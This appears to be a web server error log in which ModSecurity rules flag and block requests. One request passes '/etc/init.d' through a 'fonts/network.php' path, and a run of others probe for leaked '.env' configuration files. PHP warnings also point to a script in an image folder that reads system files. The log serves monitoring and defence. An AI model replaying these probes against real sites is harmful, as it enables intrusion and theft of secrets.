[Mon May 11 11:21:51.668286 2026] [security2:error] [pid 1254242:tid 1254246] [client 216.73.216.110:35520] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGfr74KNmD_mZ_vlf8vdQAAAEA"]
[Mon May 11 11:21:51.668758 2026] [security2:error] [pid 1254242:tid 1254246] [client 216.73.216.110:35520] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGfr74KNmD_mZ_vlf8vdQAAAEA"]
[Mon May 11 11:21:51.760124 2026] [security2:error] [pid 1254242:tid 1254246] [client 216.73.216.110:35520] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfr74KNmD_mZ_vlf8vdQAAAEA"]
PHP Warning:  filesize(): stat failed for /usr/share/man/man1/ex.1.gz in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/share/man/man1/ex.1.gz in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /usr/share/man/man1/rview.1.gz in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/share/man/man1/rview.1.gz in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /usr/share/man/man1/view.1.gz in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/share/man/man1/view.1.gz in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 11:21:57.622107 2026] [ssl:error] [pid 1254242:tid 1254261] (EAI 2)Name or service not known: [client 185.20.19.118:51523] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:21:57.622141 2026] [ssl:error] [pid 1254242:tid 1254261] AH01941: stapling_renew_response: responder error
[Mon May 11 11:21:57.625636 2026] [ssl:error] [pid 1254328:tid 1254347] (EAI 2)Name or service not known: [client 185.20.19.118:56965] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:21:57.625658 2026] [ssl:error] [pid 1254328:tid 1254347] AH01941: stapling_renew_response: responder error
[Mon May 11 11:21:57.669931 2026] [ssl:error] [pid 1254212:tid 1254224] (EAI 2)Name or service not known: [client 185.20.19.118:64653] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:21:57.669975 2026] [ssl:error] [pid 1254212:tid 1254224] AH01941: stapling_renew_response: responder error
[Mon May 11 11:21:57.676513 2026] [ssl:error] [pid 1254133:tid 1254152] (EAI 2)Name or service not known: [client 185.20.19.118:49216] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:21:57.676547 2026] [ssl:error] [pid 1254133:tid 1254152] AH01941: stapling_renew_response: responder error
[Mon May 11 11:21:58.471235 2026] [authz_core:error] [pid 1254328:tid 1254379] [client 216.73.216.110:45324] AH01630: client denied by server configuration: /home/missmand/public_html/learning/old/main/auth/cas/lib/CAS/PGTStorage/error_log
[Mon May 11 11:22:34.454494 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:39486] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /middleware/.env.debug_new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/middleware/.env.debug_new"] [unique_id "agGf2r4KNmD_mZ_vlf8vuQAAAEM"]
[Mon May 11 11:22:34.455077 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:39486] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/middleware/.env.debug_new"] [unique_id "agGf2r4KNmD_mZ_vlf8vuQAAAEM"]
[Mon May 11 11:22:37.055640 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:39486] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGf2r4KNmD_mZ_vlf8vuQAAAEM"]
[Mon May 11 11:22:37.082883 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:39502] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /middleware/.env.debug_new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/middleware/.env.debug_new"] [unique_id "agGf3WS6k_SCYd1AVZqlcAAAAQM"]
[Mon May 11 11:22:37.083098 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:39502] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/middleware/.env.debug_new"] [unique_id "agGf3WS6k_SCYd1AVZqlcAAAAQM"]
[Mon May 11 11:22:39.960411 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:39502] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGf3WS6k_SCYd1AVZqlcAAAAQM"]
[Mon May 11 11:22:54.611666 2026] [security2:error] [pid 1254242:tid 1254259] [client 185.177.72.9:50468] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /migrations/.env.production.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/migrations/.env.production.backup"] [unique_id "agGf7r4KNmD_mZ_vlf8v5AAAAE4"]
[Mon May 11 11:22:54.611893 2026] [security2:error] [pid 1254242:tid 1254259] [client 185.177.72.9:50468] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/migrations/.env.production.backup"] [unique_id "agGf7r4KNmD_mZ_vlf8v5AAAAE4"]
[Mon May 11 11:22:57.405516 2026] [security2:error] [pid 1254242:tid 1254259] [client 185.177.72.9:50468] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGf7r4KNmD_mZ_vlf8v5AAAAE4"]
[Mon May 11 11:22:57.661999 2026] [security2:error] [pid 1254133:tid 1254144] [client 185.177.72.9:50482] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /migrations/.env.production.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/migrations/.env.production.backup"] [unique_id "agGf8RjZymfuKpjWXehzEAAAAMg"]
[Mon May 11 11:22:57.662529 2026] [security2:error] [pid 1254133:tid 1254144] [client 185.177.72.9:50482] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/migrations/.env.production.backup"] [unique_id "agGf8RjZymfuKpjWXehzEAAAAMg"]
[Mon May 11 11:23:00.487993 2026] [security2:error] [pid 1254133:tid 1254144] [client 185.177.72.9:50482] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGf8RjZymfuKpjWXehzEAAAAMg"]
[Mon May 11 11:23:05.825301 2026] [security2:error] [pid 1254212:tid 1254231] [client 185.177.72.9:60876] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mocha/.env.bak_staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/mocha/.env.bak_staging"] [unique_id "agGf-UYQeUtAPynIs6xPqAAAABE"]
[Mon May 11 11:23:05.826483 2026] [security2:error] [pid 1254212:tid 1254231] [client 185.177.72.9:60876] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/mocha/.env.bak_staging"] [unique_id "agGf-UYQeUtAPynIs6xPqAAAABE"]
[Mon May 11 11:23:08.343833 2026] [security2:error] [pid 1254212:tid 1254231] [client 185.177.72.9:60876] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGf-UYQeUtAPynIs6xPqAAAABE"]
[Mon May 11 11:23:08.372500 2026] [security2:error] [pid 1254242:tid 1254266] [client 185.177.72.9:60878] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mocha/.env.bak_staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/mocha/.env.bak_staging"] [unique_id "agGf_L4KNmD_mZ_vlf8v6gAAAFU"]
[Mon May 11 11:23:08.372729 2026] [security2:error] [pid 1254242:tid 1254266] [client 185.177.72.9:60878] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/mocha/.env.bak_staging"] [unique_id "agGf_L4KNmD_mZ_vlf8v6gAAAFU"]
[Mon May 11 11:23:11.422959 2026] [security2:error] [pid 1254242:tid 1254266] [client 185.177.72.9:60878] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGf_L4KNmD_mZ_vlf8v6gAAAFU"]
[Mon May 11 11:23:11.454585 2026] [security2:error] [pid 1254212:tid 1254221] [client 185.177.72.9:60882] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mocha/.env.docker.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/mocha/.env.docker.test"] [unique_id "agGf_0YQeUtAPynIs6xPvAAAAAc"]
[Mon May 11 11:23:11.455272 2026] [security2:error] [pid 1254212:tid 1254221] [client 185.177.72.9:60882] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/mocha/.env.docker.test"] [unique_id "agGf_0YQeUtAPynIs6xPvAAAAAc"]
[Mon May 11 11:23:14.258819 2026] [security2:error] [pid 1254212:tid 1254221] [client 185.177.72.9:60882] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGf_0YQeUtAPynIs6xPvAAAAAc"]
[Mon May 11 11:23:14.290028 2026] [security2:error] [pid 1254242:tid 1254259] [client 185.177.72.9:62452] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mocha/.env.docker.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/mocha/.env.docker.test"] [unique_id "agGgAr4KNmD_mZ_vlf8v7QAAAE4"]
[Mon May 11 11:23:14.290270 2026] [security2:error] [pid 1254242:tid 1254259] [client 185.177.72.9:62452] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/mocha/.env.docker.test"] [unique_id "agGgAr4KNmD_mZ_vlf8v7QAAAE4"]
[Mon May 11 11:23:16.061431 2026] [security2:error] [pid 1254242:tid 1254259] [client 185.177.72.9:62452] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgAr4KNmD_mZ_vlf8v7QAAAE4"]
[Mon May 11 11:23:16.276140 2026] [security2:error] [pid 1254133:tid 1254138] [client 185.177.72.9:62468] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mocha/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/mocha/.env.production"] [unique_id "agGgBBjZymfuKpjWXehzKAAAAMI"]
[Mon May 11 11:23:16.276353 2026] [security2:error] [pid 1254133:tid 1254138] [client 185.177.72.9:62468] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/mocha/.env.production"] [unique_id "agGgBBjZymfuKpjWXehzKAAAAMI"]
[Mon May 11 11:23:19.850142 2026] [security2:error] [pid 1254133:tid 1254138] [client 185.177.72.9:62468] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgBBjZymfuKpjWXehzKAAAAMI"]
[Mon May 11 11:23:19.887045 2026] [security2:error] [pid 1256241:tid 1256251] [client 185.177.72.9:62482] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mocha/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/mocha/.env.production"] [unique_id "agGgB5kIEwRJMyDaV55FOgAAAUU"]
[Mon May 11 11:23:19.887281 2026] [security2:error] [pid 1256241:tid 1256251] [client 185.177.72.9:62482] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/mocha/.env.production"] [unique_id "agGgB5kIEwRJMyDaV55FOgAAAUU"]
[Mon May 11 11:23:21.327033 2026] [security2:error] [pid 1256241:tid 1256251] [client 185.177.72.9:62482] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgB5kIEwRJMyDaV55FOgAAAUU"]
[Mon May 11 11:23:24.024716 2026] [security2:error] [pid 1254179:tid 1254197] [client 185.177.72.9:39512] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env.live.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/modules/.env.live.stage"] [unique_id "agGgDGS6k_SCYd1AVZql7QAAARA"]
[Mon May 11 11:23:24.024954 2026] [security2:error] [pid 1254179:tid 1254197] [client 185.177.72.9:39512] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/modules/.env.live.stage"] [unique_id "agGgDGS6k_SCYd1AVZql7QAAARA"]
[Mon May 11 11:23:25.607798 2026] [security2:error] [pid 1254179:tid 1254197] [client 185.177.72.9:39512] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgDGS6k_SCYd1AVZql7QAAARA"]
